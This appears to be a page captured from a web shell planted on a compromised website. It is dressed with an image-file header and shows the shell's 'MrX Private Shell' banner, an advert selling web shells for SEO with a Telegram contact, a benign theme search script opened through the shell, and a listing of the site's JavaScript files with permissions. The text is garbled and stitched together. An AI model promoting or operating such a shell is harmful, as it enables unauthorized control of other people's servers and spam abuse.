����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/**
* main.js
* http://www.codrops.com
*
* Licensed under the MIT license.
* http://www.opensource.org/licenses/mit-license.php
*
* Copyright 2016, Codrops
* http://www.codrops.com
*/
;(function(window) {
'use strict';
var openCtrl = document.getElementById('btn-search'),
closeCtrl = document.getElementById('btn-search-close'),
searchContainer = document.querySelector('.header-style-1 .search'),
inputSearch = searchContainer.querySelector('.header-style-1 .search__input');
function init() {
initEvents();
}
function initEvents() {
openCtrl.addEventListener('click', openSearch);
closeCtrl.addEventListener('click', closeSearch);
document.addEventListener('keyup', function(ev) {
// escape key.
if( ev.keyCode == 27 ) {
closeSearch();
}
});
}
function openSearch() {
searchContainer.classList.add('search--open');
inputSearch.focus();
}
function closeSearch() {
searchContainer.classList.remove('search--open');
inputSearch.blur();
inputSearch.value = '';
}
init();
})(window);| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| animeonscroll.js | File | 5.38 KB | 0644 |
|
| bootstrap.js | File | 36.18 KB | 0644 |
|
| classie.js | File | 1.87 KB | 0644 |
|
| color-customizer.js | File | 19.7 KB | 0644 |
|
| easing.js | File | 5.48 KB | 0644 |
|
| fitvids.js | File | 3.35 KB | 0644 |
|
| footer-fixed.js | File | 435 B | 0644 |
|
| header1.js | File | 1.07 KB | 0644 |
|
| headroom.js | File | 6.13 KB | 0644 |
|
| infinitescroll.js | File | 21.21 KB | 0644 |
|
| isotope.js | File | 34.5 KB | 0644 |
|
| lightgallery.js | File | 17.97 KB | 0644 |
|
| main.js | File | 7.04 KB | 0644 |
|
| modernizr.js | File | 14.9 KB | 0644 |
|
| owlcarousel.js | File | 41.77 KB | 0644 |
|
| respond.js | File | 4.49 KB | 0644 |
|
| retina.min.js | File | 2.53 KB | 0644 |
|
| smartmenus.js | File | 26.76 KB | 0644 |
|
| smoothscroll.js | File | 5.29 KB | 0644 |
|
| stickykit.js | File | 3.21 KB | 0644 |
|
| thumbsplugin.js | File | 6.91 KB | 0644 |
|
| wow.js | File | 6.99 KB | 0644 |
|